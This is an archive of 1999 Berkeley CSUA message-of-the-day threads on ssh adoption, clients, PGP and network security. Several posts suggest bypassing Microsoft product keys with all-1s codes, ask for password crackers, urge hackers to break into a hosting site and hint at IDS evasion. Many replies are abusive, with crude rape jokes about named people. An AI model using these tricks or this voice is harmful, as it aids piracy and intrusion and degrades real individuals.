7/1 Sorry to bring another ssh question to the motd, but I thought others might be interested. So my company doesn't have ssh installed, but there *is* a machine I can telnet out of without going through the proxy. I compiled ssh over there, and I can't get it to connect to soda. I checked man pages, and the ssh url above, but it still dies. Here's the command line and result: > ssh -a -v -l emarkp http://soda.csua.berkeley.edu SSH Version 1.2.27 [sparc-sun-sunos4.1.4], protocol version 1.5. Standard version. Does not use RSAREF. host183: ssh_connect: getuid 27243 geteuid 27243 anon 1 host183: Connecting to http://soda.csua.berkeley.edu [128.32.43.52] port 22. host183: connect: Connection timed out host183: Trying again... Any ideas on how to fix? -emarkp \_ ssh on outgoing port 22 on your firewall is blocked, as in not open. \_ but emarkp was able to get "ssh-1.5-1.2.26" from telnet pt 22? \_ woah, they have suns at intel? \_ ssssh! Don't let anyone else know. :) I don't know how long this system has been in place. --emarkp \_ suns are better than intels. and for that matter, so is everything else. but intels are cheap which is good enough for my purposes. Any ideas on how to fix? -emarkp \_ Hint: try "telnet http://soda.csua.berkeley.edu 22" first. \_ try it again now that the campus network is back up... \_ I did. There wasn't even this much when the network was down. --emarkp and say hello to mister firewall. \_ Actually, I got through. That is, it said: Connected to http://soda.csua.berkeley.edu. Escape character is '^]'. SSH-1.5-1.2.26 -- emarkp \_ Now remove the setuid root bit from ssh. |
1999/6/30-7/1 [Computer/SW/Security] UID:16045 Activity:nil |
6/30 Telnet access to Melvyl and Gladis turned off for security reasons. ssh only. \_ I thought you did't need a password to get on the library database. Is that true? If so, why does it matter if it's secure or not? \_ Um, have you ever heard of sarcasm? How about trying "telnet melvyl" yourself to see if this was accurate (it's not). \_ Imagine that! Someone sniffing my melvyl login and doing their own research! Nefarious! |
1999/6/30-7/1 [Computer/SW/Security] UID:16040 Activity:moderate |
6/30 I asked another host machine to install a ssh client so that I could telnet there and then ssh to soda. Thing is, I can't connect because soda doesn't support ssh protocol v2. Does anyone know about plans to change this? \_ there's a slightly easier way to do this and it doesn't involve asking someone else to install something for you. \_ when data fellows makes their ssh2 implementation less stupid about their license. \_ ssh2 is still in testing and not free for use. Have them install ssh1 as well. \_ Ride BIKE! \_ Compile your own. \_ Interestingly (to me anyway), this only puts the security breach one step back. Instead of a cracker sniffing your soda account, \_ the point is that soda's subnet is filled with lemurs. they can sniff your other telnet account, and then ssh from there to soda and wreak all sorts of terrible havok! \_ Telneting somewhere just to be able ssh to soda is a really stupid idea. It not only defeats the security that the soda admins are trying to establish, but also compromises the other account as well. Get off your ass and install ssh on your owm machine or explore the possibility of using s/key. \_ The soda admins are trying to protect against sniffers on this subnet. Telnet->ssh is no dumber than purely telnet, and given the number of lemurs probably a bunch safer. |
1999/6/28 [Computer/SW/Security] UID:16029 Activity:high |
6/28 The CSUA account is mainly for social use, and it's not a mission-critical system. I've been using the Soda account for almost 6 years, and have found it's very convenient since it does not impose many of the restrictions of regular ISP accounts. Therefore, I was quite puzzled by the SSH stuff -- I understand the importance of security, but isn't the CSUA system is a hacker's system? The decentralized nature of Soda is what made it wonderful. If the current CSUA leadership wants to impose the security measures, can you at least ask for feedback and inputs from the users? I was surprised to see the login message without hearing anything about the merit of this decision. I suggest for now, the decision to shut down telnet should be postponed. \_ I second that motion (even though this thread already ran a few days ago) \_ Need to have the rms:rms account turned on. |
1999/6/27-7/15 [Computer/SW/Security] UID:16023 Activity:nil |
06/25 IMPORTANT INFORMATION: ************************************************************************ * Secure password software will be REQUIRED starting July 15th, 1999 * ************************************************************************ * Starting July 15th, all remote logins to CSUA Computers will * * require an ssh enabled program for login over the network; * * * * -= STARTING JULY 15th TELNET WILL BE DISALLOWED. =- * * * * For detailed information see: * * /csua/adm/doc/ssh-howto or * * http://www.csua.berkeley.edu/ssh-howto.html * * If you have questions, please mail help@csua * ************************************************************************ |
1999/6/25 [Computer/SW/OS/OsX, Computer/SW/Security] UID:16017 Activity:high 66%like:16014 |
6/24 It's about time EECS instructional finally enforced an ssh only policy. \_ Report them to the Commerce Dept. They're allowing foreigners to use encryption! That's illegal, the unamerican scum. \_ Fuck you. --sowings \_ Oh no, we wouldn't want that to happen would we? Now for every other machine on campus to follow suit. \_ ^suit^suite \_ it's suit, dumbass \_ Funny, it's rare that we're in the vanguard. You should check "finger @cory.eecs" though--lots of lusers still stuck with telnet. --sowings \_ What the hell is so hard about using ssh? ^telnet^ssh \_ Part of it may be that users are at a commercial site with a non-SSH-friendly firewall. --sowings \_ Not everyone uses an OS that has ssh. Not everyone has an OS. Don't be so OScentric. \_ Everybody IS using an OS that can run ssh (no I'm not talking about Palm Pilots). \_ I work at a secure site that has a terminal/modem that I use to dialout to an annex box on campus and then telnet to soda. Who the fuck are you to tell me my OS supports ssh? I don't have an OS, dumbshit. \_ will EECS install an s/key server? we do that here for cases like this, because we don't trust users to protect their reusable passwords. \_ Furthermore, some of us work behind a firewall which does not have ssh enabled (I know how stupid that sounds, but it's true). \_ I use ssh behind a firewall all the time. Mail root and tell him what a moron he is for configuring a firewall improperly. \_ I would love to use SHH -*BUT*- there is *NO* free ssh for windows I know you'll all say use linux, but I don't - so there! \_ There have been free versions for quite a while loser. http://www.net.lut.ac.uk/psst Get a new excuse. \_ And given that Window$ versions are already compiled they have less of an excuse not to use ssh than Unix people do. Yet the statistics reflect the opposite. \_ WinBlows twits are stupid. proof: axiom 1. \_ Windows: http://www.zip.com.au/~roca/ttssh.html Mac: http://www.lysator.liu.se/~jonasw/freeware.html --dim \_ TeraTerm? http://depot.berkeley.edu always has free stuff. \_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent issue? \_ porting stuff across unix tends to be very easy (ie. almost nothing to do) whereas writing a port for Win or Mac is a total pain in the ass to do. Hence, people who do write the ports ask for $$$. \_ They must be evil for not doing it out of the GNUoodness of their hearts and for the love of technology. \_ A free port at http://akson.sgh.waw.pl/~chopin/ssh/index_en.html \_ just a random check on soda: netstat -n | awk '($4 == "128.32.43.52.22") {print}' | wc -l 126 netstat -n | awk '($4 == "128.32.43.52.23") {print}' | wc -l 83 --jon \_ what is port 22 for? \_ ssh moron \_ why did this deserve a "moron"? i'm sure at one time you didn't know what port 22 is for, or even what a port was. \_ look in /etc/services moron \_ Wow, you're a real asshole. The guy knew what the command line did, but didn't know a lousy port number and isn't a linux s00per g0r0 like you so he's a moron? Are you Trevor Buckingham? \_ No, *I* am Trevor Buckingham! \_ Please start smoking pot instead of crack. \_ I am Jean Valjean \_ My name is Paolo Soto, you got into the LSCS major, prepare to die. |
1999/6/24-25 [Computer/SW/Security, Computer/SW/OS/OsX] UID:16014 Activity:very high 66%like:16017 |
6/24 It's about time EECS instructional finally enforced an ssh only policy. Now for every other machine on campus to follow suite. \_ Funny, it's rare that we're in the vanguard. You should check "finger @cory.eecs" though--lots of lusers still stuck with telnet. --sowings \_ What the hell is so hard about using ssh? ^telnet^ssh \_ Not everyone uses an OS that has ssh. Not everyone has an OS. Don't be so OScentric. \_ I would love to use SHH -*BUT*- there is *NO* free ssh for windows I know you'll all say use linux, but I don't - so there! \_ Windows: http://www.zip.com.au/~roca/ttssh.html Mac: http://www.lysator.liu.se/~jonasw/freeware.html --dim \_ TeraTerm? http://depot.berkeley.edu always has free stuff. \_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent issue? \_ porting stuff across unix tends to be very easy (ie. almost nothing to do) whereas writing a port for Win or Mac is a total pain in the ass to do. Hence, people who do write the ports ask for $$$. \_ They must be evil for not doing it out of the GNUoodness of their hearts and for the love of technology. \_ A free port at http://akson.sgh.waw.pl/~chopin/ssh/index_en.html |
1999/6/22-25 [Computer/SW/Security] UID:16002 Activity:moderate |
6/21 Can anyone give a pointer to a utility that will recover passwords from a MS Access .mdw workgroup file? \_ http://www.lostpassword.com -shac \_ Can anyone give a pointer to a utility that cracks passwords on Access files? How about Unix /etc/passwd files? MS installer codes? \_ MS Install product keys: Try using all 1's. Works every time I've tried it! Office, DevStudio, SourceSafe, etc. \_ Some take all 0's instead/as well. \_ I think only the CS department copies can do that. Normal Office/DevStudio CDs don't allow that. \_ UC doesn't get special copies of anything. I've seen the boxes, installed the software, etc. It's generic. At least for Office and the OS. Didn't install DS but the CD's looked the same. \_ All "4" works on some stuff too. \_ fdisk. |
1999/6/18-19 [Computer/SW/Security, Computer/SW/Unix] UID:15985 Activity:very high |
6/18 How much for a life account on soda? \_ soda account and having a life are mutually exclusive. \_ u must FIRST bring back root a SHRUBBERY! \_ namely marijuana \_ or MDMA \_ dissociatives are bad for you. \_ It's all bad for you. \_ is this what you learned from government sanctioned propaganda and programs like D.A.R.E ? You're the kind that they like, follow directions, don't question authority and you'll do fine. \_ No, child, this is what I learned from watching my girlfriend destroy her life. You're a prick. Little wannabe druggy fucks all think they're so smart and anti- government-conspiracy and all that bullshit. Well, clue time. You're just a dumb shit moron burning out your brain and body. I'm not a child of the DARE generation. I'm a child of the been-there-knows-that- first-hand generation. _/ Then someone of your OBVIOUS wisdom, and intelect would surely refrain from generalizing comments like, "it's all bad" I bow before you unending insight and wisdom, but clearly you can't be serious about comparing your crack-whore gf to an occasional pot smoker or social drinker. \_ You're a prick. Please dope up and drive off a cliff and drown to death. The world will be a better place. \_ First you must get a life. Life accounts are only awarded to those who graduate with all 5 life points. |
1999/6/11-12 [Computer/SW/Security, Computer/HW] UID:15946 Activity:high |
6/11 Thirdvoice again! http://nototv.hypermart.net seems they have added some javascript, and put it into the public domain, that hoses thirdvoice's functionality. they are using refresh loops (KLUDGE) to flush the notes every 1000 milliseconds or something. really screwey, and it has a tendency to crash things. also, thirdvoices server has been hosed today. i am thinking that with each flush, my client tries to get the notes from thirdvoice, then the connection gets abandoned and leaves a zombie http connection that their server takes x tens of seconds to flush out. so, the hypermart people are, in a way, mounting an attack on thirdvoice. probably a great time for any of you good hackers to get into hypermart and fuck shit up. -caliban \_ can't you just hit the Stop button / Escape? \_ All I can say is kludges are just that, kludges. -Judd \_ thirdvoice is really racking up the enemies. Either abovenet died or someone threw a denial of service attack at them. \_ got any more info? -caliban \_ I do. Send a resume. :-) -Judd \_ it was just paranoia -- one of abovenet's cat5000'si 'got confused'. \_ apparently http://www.macosrumors.com has come out against 3v too -caliban \_ I'm tellin you, its all them snooty web designers, who dont want to hear someone making bad comments on their sites. -ERic \_ I'm against hatred and war. Hasn't stopped hatred and war. |
1999/6/8-9 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:15917 Activity:high |
6/8 Commentary on third voice: http://www.macnn.com/contributions/webpages.shtml \_ can anyone see the notes posted on that page? i have thirdvoice installed, and it works on other pages. there are notes posted on that page; thirdvoice pulls up the topics in their frame but i am unable to read them. clicking on the note icon in the text does not work. i get an occasional javascript error, i wonder if they are hosing the thirdvoice stuff somehow. --caliban \_ I can read it ok. That's what public betas are for. If you mail your system details and the URL to feedback@thirdvoice.com someone will check it out. -Judd \_ strangely enough that site's annotations are failing in my 3rdvoice client too. -Eric \_ Watch the web designer weenies whine! They just can't share the internet. \_ Amazing! Singaporeans pushing the limits of free speech. \_ Yeah, go figure! |
1999/6/4-5 [Computer/SW/Security] UID:15906 Activity:moderate |
6/4 http://Amazon.com wanx. Amazon lets the publishers have access to customer reviews two days BEFORE they are actually posted, giving them time to write up two or three 'good' reviews the same day the 'not-so-good' review comes out. Eg., look for books written by Steve S. Miller, published by McGraw Hill. His books absolutely suck, but he somehow has all these totally cheesy reviews posted by anonymous readers who all say the same overly complimentary things. Stuff you'd never find on the Soda motd. \_ sounds legal and like standard business practice to me \-while i think this kind of disclosure/discussion is useful, i dont look to amazon for book reviews ... i want one thing from them and that is cheap prices and decent customer service. in my experience "truth" comes out of a dialectic ... from reading multiple sources. generally you shouldnt look for "one relaible source" ... unless it is me or the ecomonist. --psb \_ Uh, The Economist has its idiosyncracies too (e.g., declaring that Clinton should resign the week Monica-gate broke: a little premature, as they themselves later admited) --Economist Reader |
1999/5/23-25 [Computer/SW/Security, Computer/SW/Unix] UID:15862 Activity:high |
5/23 Did you hear that Ari and Christine are married? \_ "If you need to ask, you don't know." \_ Why should we care? \_ How many times have we heard about this? \_ Which Christine? (Which login?) \_ the one with 3 different logins because she can't make up her mind. \_ The one that's been living with ari for years. If you don't know her login, you don't know her and don't need to know. (Hint: If you pay any attention to walls, you know who.) \_ Why does anyone care? Just shut up. It's not like, "Did you hear Ari and Christine are tag team serial killers?" \_ This is outrageous. There is no evidence that Christine has help Ari with any of his crimes, especially not serial killing. \_ there's a website out there of her holding down twaung while ari rapes him \_ http://www.networkgen.com/~twaung/images/bean1.jpg \_ Damn! I got 403 Forbidden. \_ what kind of lamer puts an image in his PUBLIC HTML "images directory, then revokes view privilege for it? Either have it there, or not. sheesh. \_ I thought it was Ari holding him down while xtine raped him. \_ I just want to check out her pics if she has a home page, to see how lucky/unlucky Ari is. \_ Ari is filthy rich, Christine is a lot hotter than your hand, you just lose in comparison. \_ I dunno dood....My hand is pretty good looking. \_ ~chris \_ Boy-child, luck has nothing to do with it. The sooner you get over that idea, the sooner you'll be making love to a woman instead of your hand. \_ And if you're Ari, this will include cheating too. \_ What? Do tell! \_ That was what I thought until I have this hot babe fall from the sky. \_ What'd she weigh? Or did you let her bounce a few times first? |
1999/5/20-21 [Computer/SW/Security] UID:15848 Activity:nil 66%like:16541 |
5/20 Access to Software for All People jobs is /csua/pub/jobs/ASAP |
1999/5/19-20 [Computer/SW/Security, Computer/SW/Unix] UID:15840 Activity:high |
5/19 Dear root It would be really cool if you could remove all the old job listings from /csua/pub/jobs, I'd be more than happy to do it myself but my BSD security compromising fu is lacking. You see I need to find a job so I can afford an NT license, I can't get any work done without that wonderfull paperclip helping me along the way. Thank you very much and may god love you for ever. job-less on CSUA \_ find a headhunter. try http://dice.com \_ Wired is hiring. http://www.hotwired.com/jobs good luck. \_ ls -l will tell you when a company's job listing was last fiddled with. Old listings' job openings probably don't exist, but the company probably still does. If the company sounds interesting, try their website. |
1999/5/17-18 [Academia/Berkeley/CSUA, Computer/SW/Security, Computer/SW/Unix] UID:15822 Activity:kinda low |
5/17 PLEASE clean up your old crap in the /csua/pub/job dir! \_ I'd like to, but all the files and dirs I put there before are now owned by root. Darth Maul kills Qui-Gon. \_ root would be happy to help you with this problem. |
1999/5/15 [Computer/SW/Security, Computer/SW/Unix] UID:15815 Activity:high |
5/15 It's the "Message Of The Day", not "Messages Of Last Week". If you don't want it nuked, start something fresh. \_ It's also not the standard root-only motd. You want it wiped once a day, petition root to make a cron job. Since you obviously don't "get it", just use a .hushlogin and leave the rest of us alone. \_ I don't want it wiped once a day, I want it to not be full of stupid trollfests from a week ago that keep getting replaced by the original trollers. \_ Dumbshit, nothing on the motd was more than 48 hours old. Get a fucking calendar. \_ maybe ERic should stop rcsing the motd. That is how poeple get old copies to replace it with. \_ No it isn't. It is actually possible to save a copy yourself. This may come as a stunning revelation to you, but the cp command isn't root only. |
1999/5/7 [Computer/SW/Security] UID:15769 Activity:high |
5/6 /usr/local/bin/premail is installed. It connects to the "nym" remailer. It requires pgp2.6 to work. The nym server uses a 2048 bit key. Ours only supports 1024 bit keys. \_ jon@soda:~ ttyRP 1:19:07am 6% pgp -kg Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses. (c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94 Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc. Distributed by the Massachusetts Institute of Technology. Export of this software may be restricted by the U.S. government. Current time: 1999/05/07 08:22 GMT Pick your RSA key size: 1) 512 bits- Low commercial grade, fast but less secure 2) 768 bits- High commercial grade, medium speed, good security 3) 1024 bits- "Military" grade, slow, highest security Choose 1, 2, or 3, or enter desired number of bits: 2048 Generating an RSA key with a 2048-bit modulus. --I dont know who the fuck you are, but 1) you didnt mail root and 2) you arent even smart enough to read the fucking directions that pgp gives you on a fucking silver platter. --Jon \_ Valium, homeboy. He probably meant that pgp supports a maximum 1024 bit keylength. -John \_ but it doesn't. \_ Yes, I know that, and you know that, but it didn't show up in the options and he was probably tired and didn't think that far. No reason to go apeshit. -John "fuck" \_ wierd. tried again, it worked now. BUt it failed before, complaining aobut keylength. \_Why is soda stuck on 2.6.2? PGP 5 is available for *NIX, with 6 available within the month. 6 supports 4096-bit keys, which if you read Cryptonomicon (Neal Stephenson's new book) is secure for 100 years and may even be suitable to keep secure until men are no longer capable of evil! (forever). As far as I know, the book does not have a protagonist who attended UCB in the 90's and studied CS (as snow crash did) --cody \_ /usr/local/bin/pgp /usr/local/bin/pgpencrypt /usr/local/bin/pgp5 /usr/local/bin/pgpk /usr/local/bin/pgp_old /usr/local/bin/pgps /usr/local/bin/pgpdecode /usr/local/bin/pgpshow /usr/local/bin/pgpe /usr/local/bin/pgpsign /usr/local/bin/pgped /usr/local/bin/pgpv --Jon. Hint Hint, it is possible to have both installed. |
1999/4/5 [Computer/SW/Security] UID:15695 Activity:high |
4/5 If sshd does host authentication for .shosts files why do people still say that .shosts is still insecure. This is assuming that all the entries point to a computer that I maintain and I am the only user on that system. \_ how do i use shosts? is it the same as rhosts? \_ if someone breaks into that system, they can steal the host key. But .shosts is reasonably secure. -tom \_ How secure is having tcp-wrappers blocking all external connections and running this computer on a ppp dialup connection that times out after 15 minutes of inactivity. I'd think it would be pretty obvious if someone broke in. \_ tcpwappers probably doesn't wrap all your services. -tom |
1999/3/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:15662 Activity:nil |
3/30 In a /lib /usr/lib directory what's the diff between a lib*.a and a lib*.so file? \_ .a is "archive" and produces static (compile-time) linking, while .so is "shared object" and produces dynamic (run-time) linking. \_ so what the heck is "linking"? \_ man ld \_ well, if you're a DOS weenie, a .so file is like a .DLL file in short: .a files are things that get added to your program when you compile it; people don't need them to run the executable, but it's huge. .so files get "added" (linked) when a person runs the program, so they need to have copies of them, but the executable is smaller. generally .so (shared libraries) are better because then 100 programs on your machine can use one library without (essentially) having 100 copies of the library present in every executable -dbushong |
1999/3/29-30 [Computer/SW/Security] UID:15652 Activity:moderate |
3/29 Is there a cel phone service in the area that lets me call in the entire state? I want to be able to use it both here and Los Angeles. -- brendal \_ yes. have you even looked at any of the service providers yet at all? cellone and gte have both been advertising this sort of option heavily. the former lets you call from anywhere in california but hasn't come out with a nationwide plan yet. gte has a national onerate service plan. \_ Pacbell PCS does it if you get an extra $20/month plan named WildFire. GTE does not do it. L.A. is roaming at 0.40/min. Sprint does it but has no coverage on the long-distance freeways. PacBell and CellOne are the solid west-coast choices. Otherwise GTE or Sprint would be cheaper if you are on the east coast too. |
1999/3/29-30 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:15649 Activity:moderate |
3/29 How do I test to see if a file has "other" +"read" permissions in C? \_ man 2 stat? \_ or check out the access(2) manpage. \_ stat doesn't have anything to do with accessibility and access uses user ID to check for access \_ which part of "mode" don't you understand? \_ stat has this: mode_t st_mode /* File mode */ |
1999/3/12-13 [Computer/SW/Security] UID:15584 Activity:nil |
3/11 There's ssh and scp. Is there sftp? I want to interactively get and put a file. scp is rather inconvenient. \_ DataFellows ships an sftp but it's just making an ssh tunnel to the ftp-cmd channel for you to use. It only secures the command channel and requires that you have some account on the remote machine. Due to the design of the ftp protocol, it is difficult to secure the data channel, though there are ways to do this that involve a bit of work on the part of an administrator. --jon \_ I'm sure you could just write a little script called sftp that would establish a secure channel and tunnel ftp automatically. \_ no, you can not do it with a simple shell script for the data channel. The command channel is simple, data is not with most of the unix ftp clients available. \_ in many cases, you need to hack the ftp client from source (or edit raw binary for the truly fooful) to get it to use arbitary host:port's for the data channel (you need to use ftp's passive mode btw). There is a way to combine both the data and command channel for easier forwarding through a novel use of a socks proxy. This is the "bit of work" to which I earlier referred. --jon \_ Most people only really care about securing the command channel because of the password. If you were working on something top secret, however, that would be a diff story and you should just use the inconvenient scp. \_ How about: ssh -f -L 1234:csua.berkeley.edu:23 http://csua.berkeley.edu sleep 20 </dev/null >/dev/null as adapted from the fetchmail manpage? \_ What about writing an expect script to transfer files using ssh? For example, if I want to get a file to my machine from soda I can do: ssh soda -C cat filenameOnSoda > fileNameOnMyMachine You can use the same trick to send a file. You could write a script that would also let you do ls and other stuff too. -emin \_ the nice thing about a "secure ftp" is that you amortize the cost of the SSH authentication process over the transfer time of a number of files rather then once for each file transferred, and yet you can still deal with files on a individual, interactive basis. Doing ls via another ssh-wrapper would just add to the number of ssh-authentications needed, which for some users is a high cost. --jon \_ Try SRP. It provides a secure ftp and ftpd, along with a few other cool security features. \_ Can someome who has looked at SRP explain what it is about? |
1999/3/10-11 [Computer/SW/Security] UID:15574 Activity:very high |
3/9 Given all the network sniffing that goes on, how about turning off telnet and rlogin on soda and force everybody to use ssh? I think the cost of dealing with ssh problems outweighs the consequences of a break-in. What do you guys think? \_ no ssh installed on UCB dialup CLI connections \_ I honestly have to wonder how many people still use CLI from the annexen. --sowings \_ All the lazy people who don't want to bother to setup ppp. \_ Discriminates against our non-US-citizen members who we legally aren't allowed to let use ssh/sshd. (Stupid US goverment fucknuts) \_ sshh...you don't want to make fun of the US govt. They might be watching the motd and consficate soda. \_ You're wrong; the most popular implementations of SSH for all major platforms (Windows/Mac/Unix) are developed and sold outside of the US. The US is starting to lag, not lead, in crypto software, because of crypto export laws. \_ So. That has nothing to do with the CSUA violating the law everytime it allows a non-citizen to use encryption software - even if they downloaded ssh on their own, it's useless without the sshd software running on soda. \_ I know of a supercomputer center run by the government and foreign users connecting to that system MUST use ssh. If it's OK for them, it's probably OK for soda. --peterM \_ There is no free SSH client for Windoze, to my knowledge -muchandr \_ http://www.zip.com.au/~roca/ttssh.html --dim \_ F-Secure SSH seems to be free as well. \_ only for 30 day trial \_ Then you should look at http://www.net.lut.ac.uk/psst and learn much... \_ http://www.ocf.berkeley.edu/~tee/ssh \_ who cares? my ssh key into an sshd on a machine run my people i dont \-I think this is an insane idea. I dont want to type my ssh key into an sshd on a machine run by people i dont know and i dont trust ... and I would rather not set up a "low security" ssh key in addition to my regular one. given all the network sniffing that goes on, use rhosts and dont trust soda on machines you care about. What are you going to do about the XDM machines? I disagree with your cost-benefit analysis. The cost of a compromised passwd isnt that high. The cost of a compromised ssh key is high. For one thing, the hacker can hide from IDS systems. I wont go on any more. It was reasonable to float this balloon, but crazy to jump on it. --partha "i watch the net" banerjee \_ you never ever type your ssh-passphrase to a remote process. the remote sshd, when you use RSAAuthentication, provides you a challenge to which you respond. That response is the equivalent of doing an RSA encrypt with your private key which the remote sshd tries to decrypt with the public key you deposited on the remote host earlier. If what the remote sshd obtained by decrypting your response with your public key and and the original challenge coincide, then you are authenticated. Of course, if you do not trust RSA, and think someone may use your public key to obtain your private key and the pass prase you use to further protect it against local machine attacks, thats another story. --jon \_ Oh great psb, please sniff my network in a sexual way. -psb #1 fan \_ Poser. The real -psb #1 Fan \_ Uh, partha, you do realize that you don't need to use RSA authentication to still get most of the benefits of ssh. \- yes but realistically you see more trojaned clients and daemons than seq number or spoof attacks. my point was this imposes a reasonable cost for people who log in from a lot of different machines. \_ It would be pretty obvious if you had logged into a trojaned sshd server. In addition to the server authenticating you the client also authenticates the server and spews a nasty message if the authentication fails. \_ What do seq number or spoof attacks matter? The attacks we see daily on campus are packet sniffers. ssh eliminates the threat of packet sniffing script kiddies, whether or not you use RSA authentication. -tom \_ I think he is saying that he believes one is better off using rlogin and .rhosts as attacks spoofing a connection from a trusted host or attempting to hijack your connection are rarer than trojan attacks. --sky \_ Do you passively sniff traffic or do you run the IDS on a gateway and dynamically block packets? If you are just passively watching the traffic, until TCP/IP stacks are standardized, your IDS can be circumvented 7 ways to sunday. Its so easy to inject packets that will put the IDS and the target host's stack in inconsistant states. How do you deal with something as simple as TTL? --sky "i 0wn j0r n3t w1th my 31337++ hAx0r sk1LLz" king \-the TTL problems is in fact tricky and really basically intractible. i think we are cleverer than you think. i cant discuss exactly what we do, but if you have some attack based on ttls ot fragmentation or whatever, anything stealthy, as opposed to a flood/DoS, we would be interested in talking to you to see if you can evade our monitor. the commercial monitor cos are just interested in profit maximizing ... so if it would take a huge effort to fix something and lacking that one thing isnt hurting their sales much, then they wont fix it/ for example a major IDS which will remain nameless only keeps 3minutes of "state", which means if you just control-z a connection for 3min, you have probably evaded the monitor. anyway, if you are serious drop us a note. i am not going to publicly comment on the non-passive part of the monitoring. --psb \_ Yeah. We have a whole library of scripts written in a custom language for sending and receiving raw net traffic that we use for OS fingerprinting, firewall penetration testing, and IDS circumvention. We have a collection of scripts whose purpose is to exploit descripencies in stack implementation so that the IDS and the target systems state become disjoint, allowing us to insert evil data w/o the IDS detecting it. It would be interesting to see how BRO handles under these conditions. --sky \_ "non-passive": guys in full-length black Kevlar suits with BIG GUNS \that's "big *fucking* guns" to you. --psb \_ Um, this whole conversation has me completely lost. Any sources to strengthen my security/network fu? \_ How about just forcing telnetd/rlogind users to use one-time passwords until they can be elite enuf to use some kind of encrypted login system? \_Is using ssh w/o sshd a waste of time? \_ sshd is the server; ssh is the client.. they're pretty useless without each other. You probably meant "w/o ssh-agent" And no, ssh is still useful without ssh-agent, whatever psb might think about the impossiblity of ssh password authentication --dbushong \-i dont even know what "the impossibility of ssh passwd authentication means". the only think i said was close if not actually impossible was for a passive monitor upstream from a destination host to replicate the stream it would see if it were in a different point in "net space". aka "the TTL attack". --psb \_ some silly places have ssh set up to automatically call rlogin when the target host is not running sshd. this is a completely useless way to run ssh, and might screw you one day when you're tired and not noticing that this time your connection is not encrypted. \_ You implied in your original post that you need to generate an ssh key in order to use ssh, which is not true. --dbushong \-BTW, is anyone familiar with the stuff at <DEAD>srp.stanfraud.edu<DEAD>? --psb \_ Yes. mconst was thinking of patching it into ssh one of these days. --dbushong |
1999/2/24 [Computer/SW/Security] UID:15469 Activity:nil |
2/23 HELP TURN BAY BRIDGE FRAUD ON IT'S HEAD!!!! One-click E-Z activism: <DEAD>users.lanminds.com/~jmeggs/baybridge.html<DEAD> Cool editorial in SF Chronicle today: http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/02/23/ED54484.DTL |
1999/2/19-21 [Computer/SW/Security] UID:15449 Activity:low |
2/19 Don't buy from Site For Sore Eyes. Besides being incompetent, overpriced, and complete liars ("Your insurance will cover it."), their service sucks and their warranty is virtually useless. \_ Try "For Eyes". Prices are fairly reasonable and service is very friendly. They also have a good warrenty on their stuff. \_ "For Eyes" will also fix your b0rken eyewear free of charge even if you didn't buy it there...if it can be fixed. |
1999/2/1-2 [Computer/SW/Security, Recreation/Media] UID:15340 Activity:low |
2/1 http://www.infobeat.com/stories/cgi/story.cgi?id=2558287745-883 At&t phone service over cable tv cables. \_ would you trust people who can't even keep up their own web site? and who can't promise a representative will get back to you sooner than "sometime in the next 24 hours"? |
1999/1/28-29 [Computer/SW/Security] UID:15310 Activity:moderate |
1/27 Why isn't biff working? Why isn't comsat running? \_ because comsat is a stupid idea and a security hole. \_ What kind of security holes exist? Can't we just use pam.d to block all comsat access EXCEPT 127.0.0.1? \_ root compromises from 127.0.0.1 are still root compromises. \_ just run philbiff +lots, its much coooler. -ERic \_ use "newmail" \_ Procmail and a few lines of perl works better. |
1999/1/26-29 [Computer/SW/Security] UID:15296 Activity:kinda low |
1/26 Is it possible to SSH out through a firewall to, say, soda? For some reason, my connection keeps timing out. \_ depends on the firewall and the ssh installation. \_ try ssh -v, ssh -P, and ssh -v -P \_ Is it possible they blocked outgoing connections. As the above said, it depends. __ / \ / ..|\ (_\ |_) / \@' Woof! Damn your mom was good. / \@' Woof! Damn yer mom was good. / \ _ / ` | \\/ \ | _\ \ /_ || \\_ \____)|_) \_) \_ stay! good doggie. __ / \ / ..|\ (_\ |_) / \@' / \ _ / ` | \\/ \ | _\ \ /_ || \\_ \____)|_) \_) |
1999/1/21-23 [Computer/SW/Security] UID:15276 Activity:nil |
1/21 Rewling ssh/telnet client for winblows... http://www.vandyke.com \_ Better ssh/telnet client for windows, and this one's free: http://www.zip.com.au/~roca/ttssh.html |
1999/1/17-18 [Computer/SW/Security] UID:15246 Activity:kinda low |
1/15 Two sys admin questions: 1) How do I disable EXPN in sendmail 8.8.7? 2) Is ssh 1.1 client compatible with ssh 2.0 server? \_ i think you need to install the old sshd and then tell ssh2d to accept ssh connections using sshd rather than ssh2d. The protocols are different and hence are not compatible. \_ bang yourself on the head with a ball-peen hammer until you get over this stupid idea that you should disable EXPN. -tom 2) Is ssh 1.1 client compatible with ssh 2.0 server? \_ i think you need to install the old sshd and then tell ssh2d to accept ssh connections using sshd rather than ssh2d. The protocols are different and hence are not compatible. |
1999/1/14-17 [Computer/SW/Security] UID:15232 Activity:high |
1/13 Irish lassie makes encryption breakthrough: URL: http://www.msnbc.com/news/231690.asp \_ Who cares? The only people who use encryption are pinko commies and perverts with something to hide . . . and dirty foreigners. It's no surprise that a foreigner came up with this. I wouldn't be surprised if she turns out to be a commie. \_ Gee. If that 16-year-old girl were a Cal student instead, would you guys say the same thing? \_ It would depend on whether or not she was a hottie. \_ She was rather plain but I'm sure soda geeks would be all over her. \_ Has it been subjected to any serious peer review? Bruce Schneier points out that smart people are wont to invent bad ciphers when they ignore peer review... \_ It was submitted to a school science fair. (or fare? wtf is the online dictionary?) \_ /csua/bin/webster \_ I would be really interested to see an alternative crypto algorithm that is "10 times faster than RSA". Unfortunatly the most technical detail provided by the URL is that she used 2x2 matrices. \_ Is there a philcrypt? I'll bet that Phillip could kick her ass without even trying . . . \_ cnn reported that an unknown American student known only as "Phillip" appeared at her home in Ireland and kicked her ass. Witnesses reported that he didn't even work up a sweat. \_ There's better info at: http://slashdot.org/comments.pl?sid=99/01/13/0931237&cid=500 Summary: no big deal \_ How long does it currently take to encript one piece of email? If it only takes 1ms or so, it isn't a big deal even if it's ten times faster, right? How many pieces of email can you send in one second? \_ Currently, public-key encryption is too slow to use even for email -- that's why programs like pgp encrypt your mail using ordinary 